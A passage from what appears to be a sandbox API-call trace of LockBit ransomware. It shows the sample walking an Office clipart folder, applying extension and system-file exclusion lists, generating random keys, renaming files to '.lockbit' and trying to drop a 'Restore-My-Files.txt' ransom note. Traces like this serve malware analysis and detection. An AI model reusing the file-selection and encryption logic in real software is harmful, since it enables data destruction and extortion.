office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.391] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a415a00, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a415a00, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02039U.BMP", cAlternateFileName="")) returned 1 [0168.391] lstrcmpiW (lpString1=".", lpString2="PH02039U.BMP") returned -1 [0168.391] lstrcmpiW (lpString1="..", lpString2="PH02039U.BMP") returned -1 [0168.391] PathFindExtensionW (pszPath="PH02039U.BMP") returned=".BMP" [0168.391] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.391] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.391] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.391] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.391] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.392] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.392] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.392] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02039U.BMP") returned 1 [0168.393] lstrcmpiW (lpString1="ntldr", lpString2="PH02039U.BMP") returned -1 [0168.393] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02039U.BMP") returned -1 [0168.393] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02039U.BMP") returned -1 [0168.393] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02039U.BMP") returned -1 [0168.393] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02039U.BMP") returned 1 [0168.393] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02039U.BMP") returned -1 [0168.393] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.393] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02039U.BMP") returned=".BMP" [0168.393] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.393] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.393] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.394] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.394] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02039U.BMP.lockbit") returned 72 [0168.394] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02039U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02039u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0168.395] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.395] malloc (_Size=0x40068) returned 0x1ff1e60 [0168.395] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=31968) returned 1 [0168.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.395] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0168.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0168.396] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.400] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02039U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02039U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.401] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.401] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.402] free (_Block=0x1fa2ed8) [0168.402] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02039U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.402] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.402] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.402] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x857ca600, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x857ca600, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02040U.BMP", cAlternateFileName="")) returned 1 [0168.402] lstrcmpiW (lpString1=".", lpString2="PH02040U.BMP") returned -1 [0168.402] lstrcmpiW (lpString1="..", lpString2="PH02040U.BMP") returned -1 [0168.402] PathFindExtensionW (pszPath="PH02040U.BMP") returned=".BMP" [0168.402] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.402] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.402] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.402] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.402] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.402] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.402] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.403] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.403] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.403] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02040U.BMP") returned 1 [0168.404] lstrcmpiW (lpString1="ntldr", lpString2="PH02040U.BMP") returned -1 [0168.404] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02040U.BMP") returned -1 [0168.404] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02040U.BMP") returned -1 [0168.404] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02040U.BMP") returned -1 [0168.404] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02040U.BMP") returned 1 [0168.404] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02040U.BMP") returned -1 [0168.404] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.404] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02040U.BMP") returned=".BMP" [0168.404] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.404] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.404] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.405] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.405] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02040U.BMP.lockbit") returned 72 [0168.405] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02040U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02040u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0168.406] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.406] malloc (_Size=0x40068) returned 0x3df0008 [0168.406] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32184) returned 1 [0168.406] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.407] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0168.407] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.407] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.407] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0168.407] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0168.411] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02040U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02040U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.412] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.412] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.414] free (_Block=0x1fa2ed8) [0168.414] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02040U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.414] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.414] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.414] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf32cd000, ftCreationTime.dwHighDateTime=0x1bd4e5c, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf32cd000, ftLastWriteTime.dwHighDateTime=0x1bd4e5c, nFileSizeHigh=0x0, nFileSizeLow=0x6afc, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02053J.JPG", cAlternateFileName="")) returned 1 [0168.414] lstrcmpiW (lpString1=".", lpString2="PH02053J.JPG") returned -1 [0168.414] lstrcmpiW (lpString1="..", lpString2="PH02053J.JPG") returned -1 [0168.414] PathFindExtensionW (pszPath="PH02053J.JPG") returned=".JPG" [0168.414] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0168.414] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0168.414] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0168.414] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0168.414] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0168.414] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0168.414] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0168.414] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0168.414] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0168.414] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0168.415] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0168.415] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0168.416] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0168.416] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0168.416] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0168.416] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0168.416] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0168.416] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0168.416] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02053J.JPG") returned 1 [0168.416] lstrcmpiW (lpString1="ntldr", lpString2="PH02053J.JPG") returned -1 [0168.416] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02053J.JPG") returned -1 [0168.416] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02053J.JPG") returned -1 [0168.416] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02053J.JPG") returned -1 [0168.416] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02053J.JPG") returned 1 [0168.417] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02053J.JPG") returned -1 [0168.417] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.417] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02053J.JPG") returned=".JPG" [0168.417] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0168.417] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0168.417] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0168.417] lstrcmpiW (lpString1=".frm", 